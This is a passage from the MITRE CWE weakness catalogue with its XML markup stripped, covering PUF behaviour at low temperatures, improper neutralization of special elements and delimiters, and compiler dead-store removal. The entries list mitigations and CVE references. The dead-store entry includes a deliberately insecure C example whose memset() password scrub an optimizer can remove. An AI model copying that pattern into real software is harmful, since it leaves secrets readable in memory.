behavior at exceptionally low temperatures. In the - case of DRAM and SRAM, when power is cycled at low - temperatures, the device will not contain the bitwise - biasing caused by inconsistencies in manufacturing and will - instead contain the data from previous boot. Should the PUF - primitive be used in a cryptographic construction which - does not account for full adversary control of PUF seed - data, weakness would arise. - This weakness does not cover "Cold Boot Attacks" - wherein RAM or other external storage is super cooled and - read externally by an attacker. - - - - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Authentication - Varies by Context - Unexpected State - Low - Consequences of this weakness are highly contextual. - - - - - Architecture and Design - The system should account for security primitive behavior when cooled outside standard temperatures. - - - - - - - - - - Paul A. Wortman - Wells Fargo - 2020-10-23 - - - - - The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as control elements or syntactic markers when they are sent to a downstream component. - Most languages and protocols have their own special elements such as characters and reserved words. These special elements can carry control implications. If software does not prevent external control or influence over the inclusion of such special elements, the control flow of the program may be altered from what was intended. For example, both Unix and Windows interpret the symbol < ("less than") as meaning "read input from a file". - - - - - - Primary - - - - - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Confidentiality - Integrity - Availability - Other - Execute Unauthorized Code or Commands - Alter Execution Logic - DoS: Crash, Exit, or Restart - - - - - Implementation - Developers should anticipate that special elements (e.g. delimiters, symbols) will be injected into input vectors of their software system. One defense is to create an allowlist (e.g. a regular expression) that defines valid input according to the requirements specifications. Strictly filter any input that does not match against the allowlist. Properly encode your output, and quote any elements that have special meaning to the component with which you are communicating. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Use and specify an appropriate output encoding to ensure that the special elements are well-defined. A normal byte sequence in one encoding could be a special element in another. - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - Implementation - Output Encoding - While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). - - - - - CVE-2001-0677 - Read arbitrary files from mail client by providing a special MIME header that is internally used to store pathnames for attachments. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0677 - - - CVE-2000-0703 - Setuid program does not cleanse special escape sequence before sending data to a mail program, causing the mail program to process those sequences. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0703 - - - CVE-2003-0020 - Multi-channel issue. Terminal escape sequences not filtered from log files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0020 - - - CVE-2003-0083 - Multi-channel issue. Terminal escape sequences not filtered from log files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0083 - - - - - Special Elements (Characters or Reserved Words) - - - Custom Special Character Injection - - - SFP24 - Tainted input to command - - - - - - - This weakness can be related to interpretation conflicts or interaction errors in intermediaries (such as proxies or application firewalls) when the intermediary's model of an endpoint does not account for protocol-specific special elements. - See this entry's children for different types of special elements that have been observed at one point or another. However, it can be difficult to find suitable CVE examples. In an attempt to be complete, CWE includes some types that do not have any associated observed example. - This weakness is probably under-studied for proprietary or custom formats. It is likely that these issues are fairly common in applications that use their own custom format for configuration files, logs, meta-data, messaging, etc. They would only be found by accident or with a focused effort based on an understanding of the format. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Description, Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Description, Name - - - CWE Content Team - MITRE - 2009-07-27 - updated Applicable_Platforms, Description, Observed_Examples, Other_Notes, Potential_Mitigations, Relationship_Notes, Relationships, Research_Gaps, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-12-28 - updated Relationships - - - CWE Content Team - MITRE - 2010-04-05 - updated Description, Name - - - CWE Content Team - MITRE - 2010-12-13 - updated Description - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Special Elements (Characters or Reserved Words) - Failure to Sanitize Special Elements - Improper Sanitization of Special Elements - - - - Sensitive memory is cleared according to the source code, but compiler optimizations leave the memory untouched when it is not read from again, aka "dead store removal." - - This compiler optimization error occurs when: - - 1. Secret data are stored in memory. - 2. The secret data are scrubbed from memory by overwriting its contents. - 3. The source code is compiled using an optimizing compiler, which identifies and removes the function that overwrites the contents as a dead store because the memory is not used subsequently. - - - - - - - - - - - - Implementation - - - Build and Compilation - - - - - Confidentiality - Access Control - Read Memory - Bypass Protection Mechanism - This weakness will allow data that has not been cleared from memory to be read. If this data contains sensitive password information, then an attacker can read the password and use the information to bypass protection mechanisms. - - - - - Black Box - This specific weakness is impossible to detect using black box methods. While an analyst could examine memory to see that it has not been scrubbed, an analysis of the executable would not be successful. This is because the compiler has already removed the relevant code. Only the source code shows whether the programmer intended to clear the memory or not, so this weakness is indistinguishable from others. - - - White Box - This weakness is only detectable using white box methods (see black box detection factor). Careful analysis is required to determine if the code is likely to be removed by the compiler. - - - - - Implementation - Store the sensitive data in a "volatile" memory location if available. - - - Build and Compilation - If possible, configure your compiler so that it does not remove dead stores. - - - Architecture and Design - Where possible, encrypt sensitive data that are used by a software system. - - - - - The following code reads a password from the user, uses the password to connect to a back-end mainframe and then attempts to scrub the password from memory using memset(). - - void GetData(char *MFAddr) { - char pwd[64];if (GetPasswordFromUser(pwd, sizeof(pwd))) { - - if (ConnectToMainframe(MFAddr, pwd)) { - - - // Interaction with mainframe - - - } - }memset(pwd, 0, sizeof(pwd)); - } - - The code in the example will behave correctly if it is executed verbatim, but if the code is compiled using an optimizing compiler, such as Microsoft Visual C++ .NET or GCC 3.x, then the call to memset() will be removed as a dead store because the buffer pwd is not used after its value is overwritten [18]. Because the buffer pwd contains a sensitive value, the application may be vulnerable to attack if the data are left memory resident. If attackers are able to access the correct region of memory, they may use the recovered password to gain control of the system. - It is common practice to overwrite sensitive data manipulated in memory, such as passwords or cryptographic keys, in order to prevent attackers from learning system secrets. However, with the advent of optimizing compilers, programs do not always behave as their source code alone would suggest. In the example, the compiler interprets the call to memset() as dead code because the memory being written to is not subsequently used, despite the fact that there is clearly a security motivation for the operation to occur. The problem here is that many compilers, and in fact many programming languages, do not take this and other security concerns into consideration in their efforts to improve efficiency. - Attackers typically exploit this type of vulnerability by using a core dump or runtime mechanism to access the memory used by a particular application and recover the secret information. Once an attacker has access to the secret information, it is relatively straightforward to further exploit the system and possibly compromise other resources with which the application interacts. - - - - Memory - - - - Insecure Compiler Optimization - - - Sensitive memory uncleared by compiler optimization - - - A8 - Insecure Storage - CWE More Specific - - - MSC06-C - Be aware of compiler optimization when dealing with sensitive data - - - SFP23 - Exposed Data - - - - - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Relationships - - - CWE Content Team - MITRE - 2008-11-24 - updated Applicable_Platforms, Description, Detection_Factors, Other_Notes, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2010-02-16 - updated References - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, References, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2018-03-27 - updated References, Type - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - Insecure Compiler Optimization - - - - The software does not neutralize or incorrectly neutralizes delimiters. - - - - - - Implementation - - - - - Integrity - Unexpected State - - - - - Implementation - Input Validation - Developers should anticipate that delimiters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Output Encoding - While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - Delimiter Problems - - - SFP24 - Tainted input to command - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Description, Name - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Delimiter Problems - Failure to Sanitize Delimiters - - - - The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as parameter or argument delimiters when they are sent to a downstream component. - As data is parsed, an injected/absent/malformed delimiter may cause the process to take unexpected actions. - - - - - - - - - Implementation - - - - - Integrity - Unexpected State - - - - - Developers should anticipate that parameter/argument delimiters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Output Encoding - While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2003-0307 - Attacker inserts field separator into input to specify admin privileges. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0307 - - - - - Parameter Delimiter - - - SFP24 - Tainted input to command - - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-04-05 - updated Description, Name - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Parameter Delimiter - Failure to Sanitize Parameter/Argument Delimiters - - - - The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as value delimiters when they are sent to a downstream component. - As data is parsed, an injected/absent/malformed delimiter may cause the process to take unexpected actions. - - - - - - - - - Implementation - - - - - Integrity - Unexpected State - - - - - Developers should anticipate that value delimiters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Output Encoding - While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2000-0293 - Multiple internal space, insufficient quoting - program does not use proper delimiter between values. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0293 - - - - - Value Delimiter - - - SFP24 - Tainted input to command - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-04-05 - updated Description, Name - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Value Delimiter - Failure to Sanitize Value Delimiters - - - - The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as record delimiters when they are sent to a downstream component. - As data is parsed, an injected/absent/malformed delimiter may cause the process to take unexpected actions. - - - - - - - - - Implementation - - - - - Integrity - Unexpected State - - - - - Developers should anticipate that record delimiters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Output Encoding - While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2004-1982 - Carriage returns in subject field allow adding new records to data file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1982 - - - CVE-2001-0527 - Attacker inserts carriage returns and "|" field separator characters to add new user/privileges. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0527 - - - - - Record Delimiter - - - SFP24 - Tainted input to command - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-04-05 - updated Description, Name - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Record Delimiter - Failure to Sanitize Record Delimiters - - - - The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as line delimiters when they are sent to a downstream component. - As data is parsed, an injected/absent/malformed delimiter may cause the process to take unexpected actions. - - - - - - - - - - Implementation - - - - - Integrity - Unexpected State - - - - - Developers should anticipate that line delimiters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Output Encoding - While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2002-0267 - Linebreak in field of PHP script allows admin privileges when written to data file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0267 - - - - - Line Delimiter - - - IDS03-J - Do not log unsanitized user input - - - SFP24 - Tainted input to command - - - - - - - Depending on the language and syntax being used, this could be the same as the record delimiter (CWE-143). - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Relationship_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-04-05 - updated Description, Name - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Line Delimiter - Failure to Sanitize Line Delimiters - - - - The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as section delimiters when they are sent to a downstream component. - - As data is parsed, an injected/absent/malformed delimiter may cause the process to take unexpected actions. - One example of a section delimiter is the boundary string in a multipart MIME message. In many cases, doubled line delimiters can serve as a section delimiter. - - - - - - - - - - - Implementation - - - - - Integrity - Unexpected State - - - - - Developers should anticipate that section delimiters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Output Encoding - While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - Section Delimiter - - - SFP24 - Tainted input to command - - - - - - - Depending on the language and syntax being used, this could be the same as the record delimiter (CWE-143). - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Relationship_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-04-05 - updated Description, Name - - - CWE Content Team - MITRE - 2010-06-21 - updated Description - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Section Delimiter - Failure to Sanitize Section Delimiters - - - - The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as expression or command delimiters when they are sent to a downstream component. - As data is parsed, an injected/absent/malformed delimiter may cause the process to take unexpected actions. - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Availability - Other - Execute Unauthorized Code or Commands - Alter Execution Logic - - - - - Developers should anticipate that inter-expression and inter-command delimiters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Output Encoding - While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - Delimiter between Expressions or Commands - - - SFP24 - Tainted input to command - - - - - - - - - - - A shell metacharacter (covered 